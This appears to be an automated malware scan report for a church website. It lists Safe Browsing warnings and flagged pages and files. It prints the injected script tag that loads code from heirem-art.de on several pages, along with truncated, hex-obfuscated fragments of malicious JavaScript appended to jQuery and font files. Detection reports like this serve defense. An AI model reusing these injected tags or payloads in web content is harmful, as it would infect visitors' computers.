Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=mtmoriahcogic.org
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://mtmoriahcogic.org/ | 200 OK Content-Length: 10533 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://heirem-art.de/crpzw3bh.php?id=21622358"></script> | ||
http://mtmoriahcogic.org/js/jquery-1.7.1.min.js | 200 OK Content-Length: 98158 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(a,b){function cu(a){return f.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cr(a){if(!cg[a]){var b=c.body,d=f("<" a ">").appendTo(b),e=d.css("display");d.remove();if(e==="none"||e===""){ch||(ch=c.createElement("iframe"),ch.frameBorder=ch.width=ch.height=0),b.appendChild(ch);if(!ci||!ch.createElement)ci=(ch.contentWindow||ch.contentDocument).document,ci.write((c.compatMode==="CSS1Compat"?"<!doctype html>":"") "<html><body>"),ci.close();d=c Antivirus reports:
| ||
http://mtmoriahcogic.org/js/cufon-yui.js | 200 OK Content-Length: 2733 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) 7:1f:17:6a:6b:58:69:6b:17:34:34:17:24:28:17:20:17:69:5c:6b:6c:69:65:17:65:6c:63:63:32:4:1:17:6d:58:69:17:5c:65:5b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:60:65:5b:5c:6f:46:5d:1f:17:19:32:19:23:17:63:5c:65:17:20:32:4:1:17:60:5d:17:1f:17:5c:65:5b:17:34:34:17:24:28:17:20:17:5c:65:5b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:63:5c:65:5e:6b:5f:32:4:1:17:69:5c:6b:6c:69:65:17:6c:65:5c:6a:5a:58:67:5c:1f:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:6a:6c:59:6a:6b:69: /*/a9a007*/ Antivirus reports:
| ||
http://mtmoriahcogic.org/js/cufon-replace.js | 200 OK Content-Length: 6733 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) Cufon.replace('.slogan-top,.gallery-slogan span', { fontFamily: 'Beautiful ES'}); Cufon.replace('.sf-menu > li > a ', { fontFamily: 'OptimusPrincepsSemiBold',textShadow:'1px 1px #19100a',hover:true}); Cufon.replace('.soc span ', { fontFamily: 'OptimusPrincepsSemiBold'}); Cufon.replace('.gallery-slogan strong ', { fontFamily: 'OptimusPrincepsSemiBold',letterSpacing:'-7px'}); Antivirus reports:
| ||
http://mtmoriahcogic.org/js/Beautiful_ES_italic_400.font.js | 200 OK Content-Length: 41237 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) Cufon.registerFont({"w":86,"face":{"font-family":"Beautiful ES","font-weight":400,"font-style":"italic","font-stretch":"normal","units-per-em":"360","panose-1":"2 0 5 3 8 0 0 9 0 2","ascent":"288","descent":"-72","x-height":"3","cap-height":"6","bbox":"-167.381 -270 365.782 146.271","underline-thickness":"10.8","underline-position":"-37.8","slope":"-39","unicode-range":"U 0020-U 007E"},"glyphs":{" ":{"w":55},"!":{"d":"28,-25v47,-44,99,-96,82,-97v-9,0,-17,3,-22,11xm30,-13v-10,-10,-29,5,-19,16v7,1 /*/a9a007*/ Antivirus reports:
| ||
http://mtmoriahcogic.org/js/OptimusPrincepsSemiBold_600.font.js | 200 OK Content-Length: 38218 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) Cufon.registerFont({"w":85,"face":{"font-family":"OptimusPrincepsSemiBold","font-weight":600,"font-stretch":"normal","units-per-em":"360","panose-1":"2 0 8 5 6 0 0 2 0 4","ascent":"288","descent":"-72","bbox":"0.745166 -297.207 519 91.0637","underline-thickness":"7.2","underline-position":"-44.28","unicode-range":"U 0020-U 007D"},"glyphs":{" ":{"w":87},"!":{"d":"43,-247v-62,-7,-32,128,-21,180v2,2,8,1,8,-2xm7,-37v-2,24,36,27,37,4v2,-21,-37,-29,-37,-4","w":50},"\"":{"d":"72,-192r6,-81v0,-9,-6,-16, /*/a9a007*/ Antivirus reports:
| ||
http://mtmoriahcogic.org/js/script.js | 200 OK Content-Length: 3847 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) 2d:27:27:27:27:27:21:29:2b:21:65:3b:58:70:6a:20:32:4:1:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:17:34:17:5a:66:66:62:60:5c:45:58:64:5c:22:19:34:19:22:5c:6a:5a:58:67:5c:1f:5a:66:66:62:60:5c:4d:58:63:6c:5c:20:4:1:17:22:17:19:32:5c:6f:67:60:69:5c:6a:34:19:17:22:17:5c:6f:67:60:69:5c:25:6b:66:3e:44:4b:4a:6b:69:60:65:5e:1f:20:17:22:17:1f:1f:67:58:6b:5f:20:17:36:17:19:32:17:67:58:6b:5f:34:19:17:22:17:67:58:6b:5f:17:31:17:19:19:20:32:4:1:74:4:1:5d:6c:65:5a:6b:60:66:65:17:3e:5c:6b:3a:66:66:62:60:5 /*/a9a007*/ Antivirus reports:
| ||
http://mtmoriahcogic.org/index.html | 200 OK Content-Length: 10533 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://heirem-art.de/crpzw3bh.php?id=21622358"></script> | ||
http://mtmoriahcogic.org/index-1.html | 200 OK Content-Length: 9637 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://heirem-art.de/crpzw3bh.php?id=21622342"></script> | ||
http://mtmoriahcogic.org/index-2.html | 200 OK Content-Length: 9025 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://heirem-art.de/crpzw3bh.php?id=21622344"></script> | ||
http://mtmoriahcogic.org/index-7.html | 200 OK Content-Length: 8047 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://heirem-art.de/crpzw3bh.php?id=21622354"></script> | ||
http://mtmoriahcogic.org/more.html | 200 OK Content-Length: 9456 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://heirem-art.de/crpzw3bh.php?id=21622362"></script> | ||
http://mtmoriahcogic.org/index-3.html | 200 OK Content-Length: 5527 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://heirem-art.de/crpzw3bh.php?id=21622346"></script> | ||
http://mtmoriahcogic.org/index-4.html | 200 OK Content-Length: 8137 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://heirem-art.de/crpzw3bh.php?id=21622348"></script> | ||
http://mtmoriahcogic.org/index-5.html | 200 OK Content-Length: 9256 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://heirem-art.de/crpzw3bh.php?id=21622350"></script> |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: mtmoriahcogic.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 24 Feb 2015 11:05:31 GMT
Accept-Ranges: bytes
ETag: "e2253e8-2925-50e7c7c25fd84"
Server: Apache/2.2.21 (Unix) mod_ssl/2.2.21 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 10533
Content-Type: text/html
Last-Modified: Sat, 07 Feb 2015 09:51:45 GMT
...10533 bytes of data.
GET / HTTP/1.1
Host: mtmoriahcogic.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 24 Feb 2015 11:05:31 GMT
Accept-Ranges: bytes
ETag: "e2253e8-2925-50e7c7c25fd84"
Server: Apache/2.2.21 (Unix) mod_ssl/2.2.21 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 10533
Content-Type: text/html
Last-Modified: Sat, 07 Feb 2015 09:51:45 GMT
...10533 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: mtmoriahcogic.org
Referer: http://www.google.com/search?q=mtmoriahcogic.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: mtmoriahcogic.org
Referer: http://www.google.com/search?q=mtmoriahcogic.org
Result:
The result is similar to the first query. There are no suspicious redirects found.